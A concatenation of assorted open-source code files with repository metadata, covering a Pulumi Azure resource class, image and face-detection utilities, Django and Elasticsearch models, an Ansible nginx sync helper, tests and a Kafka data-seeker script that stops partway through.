raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = kind
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'share_subscription_name'")
__props__.__dict__["share_subscription_name"] = share_subscription_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:DataSetMapping")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DataSetMapping, __self__).__init__(
'azure-native:datashare/v20201001preview:DataSetMapping',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DataSetMapping':
"""
Get an existing DataSetMapping resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DataSetMapping(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | morrell.noreply@github.com |
065035ff3eb81ee732f12a8631ea414bd57750f8 | 395c0893c7d69abd44cd4bb385771da7adb8bbb9 | /yiyuUtil/image_base/density_map_gaussian.py | 85040c6678a2825ce62f41805dde30bb041b9424 | [] | no_license | YiyuJia/pyUtil | 79a607744481c8af621e54623a7449741c13542e | 37fdc4d697f53e1745f006cbffc740f0487dcc38 | refs/heads/master | 2020-03-28T16:36:08.813486 | 2018-09-14T01:34:15 | 2018-09-14T01:34:15 | 148,244,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | import numpy as np
def fspecial_gaussian(shape, sigma):
''' MATLAB-mimicking implementation from GitHub:
https://stackoverflow.com/questions/17190649/
how-to-obtain-a-gaussian-filter-in-python '''
m,n = [(ss-1)/2 for ss in shape]
y,x = np.ogrid[-m:m+1, -n:n+1]
h = np.exp( -(x*x + y*y) / (2*sigma*sigma) )
h[h < np.finfo(h.dtype).eps*h.max()] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return(h)
def get_density_map_gaussian(image_data, annotation_data, is_verbose=False):
''' Python implementation of the method in the repo '''
h, w = image_data.shape[:2]
image_density = np.zeros((h, w))
n_annotations = annotation_data.shape[0]
H = fspecial_gaussian(shape=(15, 15), sigma=4.0)
if n_annotations == 0:
return(image_density)
if n_annotations == 1:
x = max(0, min(w - 1, int(np.round(annotation_data[0, 0]))))
y = max(0, min(h - 1, int(np.round(annotation_data[0, 1]))))
image_density[y, x] = 255
return(image_density)
for k in range(annotation_data.shape[0]):
x = max(0, min(w - 1, int(np.round(annotation_data[k, 0]))))
y = max(0, min(h - 1, int(np.round(annotation_data[k, 1]))))
x1 = x - 7
x2 = x + 7
y1 = y - 7
y2 = y + 7
dfx1, dfy1, dfx2, dfy2 = (0, 0, 0, 0)
change_H = False
if x1 < 0:
dfx1 = np.abs(x1)
x1 = 0
change_H = True
if y1 < 0:
dfy1 = np.abs(y1)
y1 = 0
change_H = True
if x2 >= w:
dfx2 = x2 - w + 1
x2 = w - 1
change_H = True
if y2 >= h:
dfy2 = y2 - h + 1
y2 = h - 1
change_H = True
if is_verbose:
print('w: {}, h: {}'.format(w, h))
print('x1: {}, x2: {}, y1: {}, y2: {}'.format(x1, x2, y1, y2))
print('dfx1: {}, dfx2: {}, dfy1: {}, dfy2: {}'.format(
dfx1, dfx2, dfy1, dfy2))
H_mod = fspecial_gaussian(
shape=(15 - (dfy1 + dfy2), 15 - (dfx1 + dfx2)),
sigma=4.0) if change_H else H
image_density[y1:y2+1, x1:x2+1] += H_mod
return(image_density)
| [
"yiyu.jia@live.com"
] | yiyu.jia@live.com |
4318de44fe9fe2d57ceebab18d1f2f5cb82599e6 | 1df4415ac1a8bd65964d01bc6848e6648f0b7665 | /core/admin.py | 728f1a52f0015417e9f1c6d73237441834b60aa8 | [] | no_license | BerkeleyBiostats/tlapp | c64c693961b841d1c81401deb96b419052a78620 | ed5320e5f21420f41f294dc694c7eede69cfe5ff | refs/heads/master | 2022-12-14T02:03:09.896481 | 2020-01-29T22:23:07 | 2020-01-29T22:23:07 | 99,958,467 | 1 | 0 | null | 2022-03-29T21:55:20 | 2017-08-10T19:34:02 | JavaScript | UTF-8 | Python | false | false | 678 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.AnalysisTemplate)
admin.site.register(models.Dataset)
admin.site.register(models.Token)
@admin.register(models.ModelRun)
class ModelRunAdmin(admin.ModelAdmin):
fields = (
"created_by",
"status",
"backend",
"ghap_username",
"ghap_ip",
"base_url",
"title",
"output_url",
"traceback",
"model_template",
"dataset",
"postprocessing_attempts",
"postprocessing_attempted_at",
"postprocessing_traceback",
"is_batch",
"last_heartbeat",
"inputs",
"code",
"provision",
)
| [
"marc@rvit.co"
] | marc@rvit.co |
4da7de01183199fb81154b4fe45ed83c89dd26ce | ea45ed4c0b35474a24b22bc7e5b4e9ade6046ce8 | /nginx_platform_backend/libs/ansible_hepler/my_runner.py | 20306f18cfc05f1d54888f17494c904fed1cf6b6 | [] | no_license | feamon/Nginx-Consul-Api | c45e08f2270535a77d25adfa974341f409eddc0d | 67f52f28ff9449432cd8ccd54f8693cec1cdde24 | refs/heads/master | 2023-07-13T03:47:41.408104 | 2021-08-26T12:34:45 | 2021-08-26T12:34:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | # -*- coding:utf-8 -*-
import sys
from pathlib import Path
from multiprocessing import current_process
sys.path.append(str(Path(__file__).resolve().parents[3]))
from libs.ansible_hepler.runner import Runner
from utils.logging import get_logger
error_logger = get_logger('log_error')
info_logger = get_logger('log_info')
def NginxAnsibleCmd(**kwargs):
"""
远程执行sync, reload nginx
:param kwargs:
:return:
"""
# import socket
# 获取程序本地运行IP,获取生成配置文件使用
# try:
# processIp = socket.gethostbyname(socket.gethostname())
# print(processIp)
# except Exception as e:
# error_logger.error(str(e))
# return {'status': 500, 'msg': "获取系统IP错误!! 详情:" + str(e)}
try:
current_process()._config = {'semprefix': '/mp'}
print(current_process()._config)
res = [{'username': 'root', 'hostname': kwargs['ansibleIp']}]
tqm = Runner(res)
# 判断操作类型, sync or reload
if kwargs['type'] == 'sync':
# {'ansibleIp': '10.0.0.80', 'type': 'sync', 'srcFile': '/tmp/luffy.ob1api.com.conf', 'destPath': '/etc/nginx/conf.d/', 'syncCmd': ''}
import subprocess
val = subprocess.check_call('scp -P 22 {0} root@{1}:{2}'.format(kwargs['srcFile'], kwargs['ansibleIp'], kwargs['destPath']), shell=True)
if val is not 0:
return
command = "bash {0}".format(kwargs['syncCmd'])
# command = "scp -P 22 {0} root@{1}:{2} && bash {3}".format(kwargs['srcFile'], "10.0.0.1", kwargs['destPath'], kwargs['syncCmd'])
print(command)
elif kwargs['type'] == "add_dump":
command = "bash {0} {1}".format(kwargs['addCmd'], kwargs['domain'])
print(command)
# 远程到 ansible 主机 dump 文件 ; 操作ansible主机上的脚本
elif kwargs['type'] == "reload":
command = kwargs['reloadCmd']
print(command)
elif kwargs['type'] == 'rmConf':
command = "bash {0} {1}".format(kwargs['rmCmd'], kwargs['rmConf'])
elif kwargs['type'] == 'justSync':
command = "bash {0}".format(kwargs['syncCmd'])
else:
return {'status': 500, 'msg': "type非法参数!!"}
ret = tqm.run(module_args=command)
# print(ret)
return {"status": 20000, "data": ret}
except Exception as e:
error_logger.info(str(e))
return {'status': 500, 'msg': str(e)}
| [
"ywl1006@outlook.com"
] | ywl1006@outlook.com |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1 | ede6ee7bdbd76dbb39ffcddfc98725062566ebf4 | /barbados/indexes/list.py | 6c9b98ec709fd610d48643a70555b79387304c46 | [] | no_license | cohoe/barbados | cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2 | 343f8fd4ac1f18e5e93d519cbc064693280e4d00 | refs/heads/master | 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
class ListIndex(Document, BarbadosIndex):
id = Text(analyzer='whitespace', search_analyzer='whitespace')
display_name = Text()
items = Object(ListItemIndex, multi=True)
class Index(BaseIndex):
name = 'list'
| [
"grant@grantcohoe.com"
] | grant@grantcohoe.com |
53061cd44e7f3bced6aaee1075f33dc0e2c60688 | 186f8d649bdbf81015686fcbdab17846fefce610 | /luke/problem-017.py | 671beaa61499700fdc9c42affefa07d95b7be4f1 | [] | no_license | toastdriven/euler | 6f945e3ca3775551f97684c3471d3fb5f7dbfc85 | e1b63827b257c41511ae48fc727321a1deac5f50 | refs/heads/master | 2016-09-01T21:21:44.745350 | 2008-04-18T14:02:25 | 2008-04-18T14:02:25 | 12,409 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,401 | py | #!/usr/bin/env python
# http://projecteuler.net/index.php?section=problems&id=17
import math
from EulerLibs import MathLibs
def strOfNum(x):
x = list(str(x))
x.reverse()
x = ''.join(x)
s = ''
i = 1
while i < 10**len(x):
skip_tens = False
# ones place
if i == 1:
if len(x) > 1 and int(x[1]) == 1:
text = ['ten','eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']
skip_tens = True
else:
text = ['','one','two','three','four','five','six','seven','eight','nine']
# tens place
elif i == 10:
text = ['', '', 'twenty', 'thirty', 'forty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety']
# hundreds place
elif i == 100:
if int(x[0]) == 0 and int(x[1]) == 0:
text = ['', 'one hundred', 'two hundred', 'three hundred', 'four hundred', 'five hundred', 'six hundred', 'seven hundred', 'eight hundred', 'nine hundred']
else:
text = ['', 'one hundred and', 'two hundred and', 'three hundred and', 'four hundred and', 'five hundred and', 'six hundred and', 'seven hundred and', 'eight hundred and', 'nine hundred and']
# thousands place
elif i == 1000:
text = ['', 'one thousand']
s = text[int(x[int(math.log10(i))])] + s
if skip_tens:
i *= 100
else:
i *= 10
return s
s = ''
for i in range(1,1001):
s += strOfNum(i)
s = s.replace(' ', '')
print s
answer = len(s)
print answer | [
"luke@735d8fd3-3d48-0410-ad09-b9318371deed"
] | luke@735d8fd3-3d48-0410-ad09-b9318371deed |
0b6430db3e092ad872d042c9a786f6e2a1997611 | 92164fc94078db110c92e93477075b8e22179386 | /posts/urls.py | 54b433c01f3c6bad9560425289f416243bd45c18 | [] | no_license | jang-1996/hacker | 6be9271b7f3e6f98273bf1b87d95d9858bca2bf9 | 388065be7290f1a7cec0fe937dd66d86948e3b1d | refs/heads/master | 2022-12-19T06:10:49.338535 | 2020-09-23T10:37:33 | 2020-09-23T10:37:33 | 285,253,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | from django.urls import path
from .views import *
app_name = "posts"
urlpatterns = [
path('new/', new, name="new"),
path('create/', create, name="create"),
path('', main, name="main"),
path('<int:id>/', show, name="show"),
path('update/<int:id>/',update, name="update"),
path('delete/<int:id>/',delete, name="delete"),
path('<int:post_id>/create_comment', create_comment, name="create_comment"),
path('<int:post_id>/post_like', post_like, name="post_like"),
path('like_list/', like_list, name="like_list"),
path('love/',love, name="love"),
path('write/',write, name="write"),
path('follower/',follower, name="follower"),
path('following/',following, name="following"),
] | [
"altu1996@naver.com"
] | altu1996@naver.com |
e7179ac72e224f97936b67a9d09b4f3507a5dcd3 | 42074b20436f11063a04ca8fb9d9e9415c3cb86f | /test/test_solutions.py | 25f095ea1c82c6d6397a06e21b64b415fedc0706 | [] | no_license | dixonalex/advent | 323fbe6939bc5c7a60b2c02269706366ed57c575 | 732e3697effbc580f03d080c14a3422e940dc043 | refs/heads/master | 2020-04-09T02:56:04.136891 | 2018-12-03T14:06:33 | 2018-12-03T14:06:33 | 159,960,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | import inject
import pytest
from advent import Config, Claim
from advent.solutions import Solutions
class TestSolutions:
@pytest.fixture()
def frequencies(self) -> [str]:
"""The example input from advent of code 2018 day 1"""
return [1, -2, 3, 1]
@pytest.fixture()
def ids(self) -> [str]:
"""The example input from advent of code 2018 day 2"""
return ["abcdef", "bababc", "abbcde", "aacccd", "abcdee", "ababab"]
@pytest.fixture()
def claims(self) -> [str]:
"""Day 3"""
return ["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"]
@pytest.fixture(autouse=True)
def setup(self, tmpdir, frequencies, ids, claims):
p = tmpdir.join("day_1.txt")
p.write("\n".join([str(f) for f in frequencies]))
p2 = tmpdir.join("day_2.txt")
p2.write("\n".join(ids))
p3 = tmpdir.join("day_3.txt")
p3.write("\n".join(claims))
def configure(binder):
cfg = Config(day_1=p.strpath, day_2=p2.strpath, day_3=p3.strpath)
binder.bind(Config, cfg)
inject.clear_and_configure(configure)
def test_day_1(self):
"""
input of [+1, -2, +3, +1] would result in
0 + 1 -> 1
1 + -2 -> -1
-1 + 3 -> 2
2 + 1 -> 3
"""
# Arrange
sut = Solutions()
# Act
part_1, part_2 = sut.day_1()
# Assert
assert part_1 == 3
assert part_2 == 2
def test_day_2(self):
# Arrange
sut = Solutions()
# Act
part_1, part_2 = sut.day_2()
# Assert
assert part_1 == 12
assert part_2 == "abcde"
def test_day_3_claim(self):
# Arrange
line = "#1 @ 429,177: 12x27"
# Act
claim = Claim.from_elf(line)
# Assert
assert claim.id == 1
assert claim.from_left == 429
assert claim.from_top == 177
assert claim.width == 12
assert claim.height == 27
def test_day_3(self):
# Arrange
sut = Solutions()
# Act
part_1, part_2 = sut.day_3()
# Assert
assert part_1 == 4
| [
"alexanderldixon@gmail.com"
] | alexanderldixon@gmail.com |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b | 12b7dc1d608b0deca429485493482afca5f99736 | /app/config/settings/dev.py | 8f40045b1ceefb621445b8de6efa70ce96e82c8e | [] | no_license | Ryanden/EB-Docker-Deploy2-practice- | 3c147786ccb6567c8e325ac79527052a15152a4a | 4e12f4e35da6d26979b6915165227f9167c507d5 | refs/heads/master | 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 | Python | UTF-8 | Python | false | false | 369 | py | from .base import *
secrets = json.load(open(os.path.join(SECRETS_DIR, 'dev.json')))
DEBUG = True
INSTALLED_APPS += [
'storages',
'django_extensions'
]
DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
77bba00ea88f7a1031c39acdd7dd923c5df2690f | a1a3c2a5eda041ed519a8102a0317c4468fe9571 | /app/models.py | bbb08b505e7f124311bc554c0385562859a8093d | [] | no_license | marwadesouky96/Fictionfone | f24eacc8e942cb0366fe6f7d8c5b8c4ba6c4c9ac | beeb46e4f5294fe50c6ad2076f8026562b76b1fe | refs/heads/master | 2020-04-01T10:52:19.616761 | 2018-10-15T15:48:14 | 2018-10-15T15:48:14 | 153,135,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from django.db import models
# # Create your models here.
# class User(models.Model):
# title = models.CharField(max_length=200)
# text = models.TextField(max_length=200)
class Tweet(models.Model):
_id = models.CharField(max_length=100)
text = models.CharField(max_length=400)
created_at = models.CharField(max_length=400)
| [
"marwadesouky96@gmail.com"
] | marwadesouky96@gmail.com |
d20bfefcbb689e95a0e699712752808cee0aabd1 | 5966449d2e29c9b64351895db2932f94f9de42da | /catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py | 74b3622b6da1649f18d3cf518a907cdaf2f04265 | [] | no_license | godaeseong/GoHriProject | 8cbce6934485b8ba3253fc7b6c5b5b59397b4518 | 425e70b7c91b6215f5477fc2250d2b0ac96577be | refs/heads/master | 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
| [
"bigdream0129@naver.com"
] | bigdream0129@naver.com |
8bca0fd28edf3e166cd6045cafd32ca1e2967550 | e10551916a2dfc6f8fdbdece8e2b45d82f249bc1 | /document_service/app/file_format/pdf.py | 19464dcc4d58ccc4280522ac3d04339ba441992f | [] | no_license | overmesgit/cogent | 71367836583a8544fbd3d8fc946a7b5134cf5f3a | 90c68853ffd929c5be76b9bb383330b74595e5e0 | refs/heads/master | 2023-08-15T18:38:38.646959 | 2021-10-11T03:20:19 | 2021-10-11T03:20:19 | 414,568,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | import io
import logging
import re
from pdfminer.high_level import extract_text, extract_pages
from app.file_format.base import BaseFileProcessor
logger = logging.getLogger(__name__)
class PdfProcessor(BaseFileProcessor):
file_format = 'pdf'
def get_file_text(self, file_data):
text = extract_text(io.BytesIO(file_data))
return re.findall(r'\b\w{3,}\b', text)
def is_valid_file(self, file_data):
try:
return bool(list(extract_pages(io.BytesIO(file_data), maxpages=3)))
except Exception as ex:
logger.error('ProcessDocumentError %s', ex)
return False
| [
"artem.bezu@localfolio.co.jp"
] | artem.bezu@localfolio.co.jp |
5b45426a98f48b6df3c7db5796b3064dcddce4fd | 65a9fe205fdac081cd765fbc8a29c4beab6fbfb8 | /tests/test_attribute_creator.py | b28cd492b4b64123e840b70983d2709d9cbf1000 | [] | no_license | Slave1488/xmldoc2html | 19e36021437e4f24d4241f424e8db09e146157ca | b14207b397d5699e03a457f953eb7fcf546ca617 | refs/heads/master | 2020-08-01T02:23:58.234303 | 2019-11-14T10:52:57 | 2019-11-14T10:52:57 | 210,827,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | import unittest
import sys
import os
try:
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),
os.path.pardir))
from layout import attributecreator
except Exception:
print('Module is missing!')
exit(1)
class TestAttributeCreator(unittest.TestCase):
def test(self):
attr = attributecreator.create_class('class_value')
self.assertEqual((attr._name, attr._value), ('class', 'class_value'))
if __name__ == "__main__":
unittest.main()
| [
"blue101blower@gmail.com"
] | blue101blower@gmail.com |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/830.py | 8c5023a11d45ce74865a0054c858b8aaa012615c | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from graphics import *
import math
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
while True:
x = math.sin(a + math.pi() / 2)
y = math.sin()
pt = Point(x + 500, y + 500)
pt.draw(spriaal)
| [
"1149061045@qq.com"
] | 1149061045@qq.com |
a383f3d07eb6e2379f905933f9769e7f3aeeb0f4 | 3f0ce0e81331667681ac0f321e8e51737220e474 | /MadLibs2/venv/Scripts/pip-script.py | 1f1c45b3b9e6908be9f37c7f27b3742cefe13698 | [] | no_license | Dominic-Perez/CSE | b75cf225fd38af67e306558bafab2d8e9336e95c | 5dac686c32e5a0e8690d775b40b9351205dfa91d | refs/heads/master | 2020-04-02T10:37:28.123642 | 2019-05-06T15:44:14 | 2019-05-06T15:44:14 | 154,347,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!C:\Users\hg65\Documents\Github\CSE\MadLibs2\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"42383380+Dominic-Perez@users.noreply.github.com"
] | 42383380+Dominic-Perez@users.noreply.github.com |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f | 3a476e0de377d1580facbfd78efdfbca009ed7a3 | /uct_test.py | 403c551b8a4100fa685aca7eda34a6d39cf067a1 | [
"MIT"
] | permissive | liuruoze/Thought-SC2 | b7366186dbb4494fabdb3e0104354665e21ff707 | b3cfbeffbfa09b952c596805d2006af24613db2d | refs/heads/master | 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 | MIT | 2023-04-24T09:06:48 | 2020-09-17T01:17:04 | Python | UTF-8 | Python | false | false | 1,300 | py | USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
# train model
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
hier_net.initialize()
if is_restore_policy:
hier_net.restore_policy()
policy_net = PolicyNetinMCTS(hier_net)
dynamic_model_path = './model/20181223-174748_dynamic/probe'
if is_restore_dynamic:
hier_net.restore_dynamic(dynamic_model_path)
dynamic_net = hier_net.dynamic_net
num_reads = 100
import time
tick = time.time()
print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
tock = time.time()
print("Took %s sec to run %s times" % (tock - tick, num_reads))
#import resource
#print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
if __name__ == "__main__":
test()
| [
"liuruoze@163.com"
] | liuruoze@163.com |
92897292184e26ebd90bb1e76081390a112ec8b1 | de38c422ffaad6b4fb32cf00df5cd806a98b4e3b | /opencv_item/face_detection.py | 39cf0f4277274d4a588dff859e07252c6187a859 | [] | no_license | Vimal06Pal/opencv | 291ce2e07dc92dd4f537c5884046536ae7ceeda9 | 46fa1162b5fcb8fa4f9d7a7b43ce75dd9175f4f9 | refs/heads/master | 2022-11-12T08:20:28.671256 | 2020-06-27T12:16:07 | 2020-06-27T12:16:07 | 270,771,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,196 | py | import cv2
face_cascade = cv2.CascadeClassifier('./data/Haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('./data/Haarcascades/haarcascade_eye.xml')
# print(face_cascade)
img = cv2.imread('./data/Modi.jpg')
img = cv2.resize(img,(512,512))
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.1, 5)
eyes = eye_cascade.detectMultiScale(gray, 1.1, 5)
'''
objects = cv2.CascadeClassifier.detectMultiScale(image,ScaleFactor,
MinNeighbours)
image = Matrix of the type cv_8U containing an image where objects
are detected.
objects = vector of rectangles where each rectangle contains the detected object,
the rectangle may be partially outside the original image.
scaleFactor = Parameter specifiying how much the image
size is reduced at each image scale
minNeighbours = Parameter specifying how many neighbours each candidate
rectangle should have to retain it.
'''
for (x,y,w,h) in faces:
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),3)
for (xe,ye,we,he) in eyes:
cv2.rectangle(img,(xe,ye),(xe+we,ye+he),(255,0,0),2)
cv2.imshow('img',img)
cv2.waitKey(0) | [
"noreply@github.com"
] | Vimal06Pal.noreply@github.com |
7d3b75ff56ceeaf5df5be51a28d10e2ea4da6bcf | a4896e2cfc73b842eb1b246a4106f298a5e39db3 | /kfk_data_seeker.py | 76a5200724d51ae1f7f6224331af18e28a62b0d0 | [] | no_license | gooa1c2e3/kfk_data_seeker | 7ab250f9604de21a5cd8131fc244f915942ebf6b | 0e2e7a047faf872a59da422c85e7c4c21e83a282 | refs/heads/master | 2021-08-24T03:59:19.430521 | 2017-12-08T00:34:29 | 2017-12-08T00:34:29 | 113,512,741 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,696 | py | # Company: CHT-PT
# Author: Chien-Yu Chen
# Date: 2017/11/23
# Mail: gooa1c2e3@gmail.com
# Support: Python 2.7
from sys import exit as _exit
from argparse import ArgumentParser
import time
from datetime import datetime
from collections import namedtuple
import traceback
try:
from kafka import KafkaConsumer
from kafka import TopicPartition
from kafka.common import CommitFailedError
from kafka.common import KafkaTimeoutError
from kafka.common import NoBrokersAvailable
except ImportError as e:
print "Error: Can not find kafka-python module, exit"
_exit(1)
__version__ = "0.0.1_py27"
def _get_parser():
""" To parse arguments from command line input """
class Options:
def __init__(self):
self._parser = self.__init__parser()
def __init__parser(self):
_usage = """Input topic and datetime, seeker could find data on kafka.
Datetime string format: YYYY-MM-DDThh:mm:ss, eg.1970-01-01T00:00:00
"""
_parser = ArgumentParser(description=_usage)
_parser.add_argument(
'-s', '--start',
help="Input datetime, it is necessary argument.",
action="store",
dest='start'
)
_parser.add_argument(
'-t', '--topic',
help='Input topic, it is necessary argument.',
action="store",
dest='topic'
)
_parser.add_argument(
'-d', '--debug',
help=""" Show exception traceback infomation """,
action="store_true",
dest='debug'
)
_parser.add_argument(
'-S', '--Seek',
help="""Change the maximum number of data to seek & poll,
3 was set by default.
If -1 was set, unlimited mode will be turn on,
seeker will try to poll all data from given offset by batches,
the maximum batch szie is 4000.""",
action="store",
type = int,
dest='seek'
)
_parser.add_argument(
'-f', '--filepath',
help='Save polled data to the given file.',
action="store",
dest='filepath'
)
_parser.add_argument(
'-F', '--offset',
help="""Instead of the offset by input datetime,
the offset of this argument would be used to poll data.""",
action="store",
type = int,
dest='offset'
)
_parser.add_argument(
'-p', '--partition',
help='Input partition, 0 was set by default.',
action="store",
type = int,
dest='partition'
)
_parser.add_argument(
'-b', '--brokers',
help="""Input broker list, it is necessary argument.
For example: 192.168.1.1:9091,192.168.1.5:9090 """,
action="store",
dest='brokers'
)
_parser.add_argument(
'-o', '--output_basic_info',
help=""" Print basic information. """,
action="store_true",
dest='output'
)
_parser.add_argument(
'-v', '--version',
help='show version',
action="version",
version='version= {}'.format(__version__)
)
return _parser
option = Options()
return option._parser
class Seeker():
""" Datetime string format: '%Y-%m-%dT%H:%M:%S'
eg. 2017-12-01T12:31:54 for 2017/12/01 12:31:54
"""
def __init__(
self,
start_datetime,
topic,
brokers=None,
partition=None,
seek_num=3,
path=None,
force=None,
):
self._partition = 0
#self._brokers = ["192.168.1.189:9092"]
self._beginning_data = None
self._last_data = None
self._CR_namedtp = namedtuple(
'ConsumerRecord',
['topic', 'partition', 'offset', 'timestamp','value']
)
if start_datetime:
try:
self._start_datetime = self._to_datetime_obj(start_datetime)
self._start_timestamp = self.datetime2timestamp(start_datetime)
except ValueError as e:
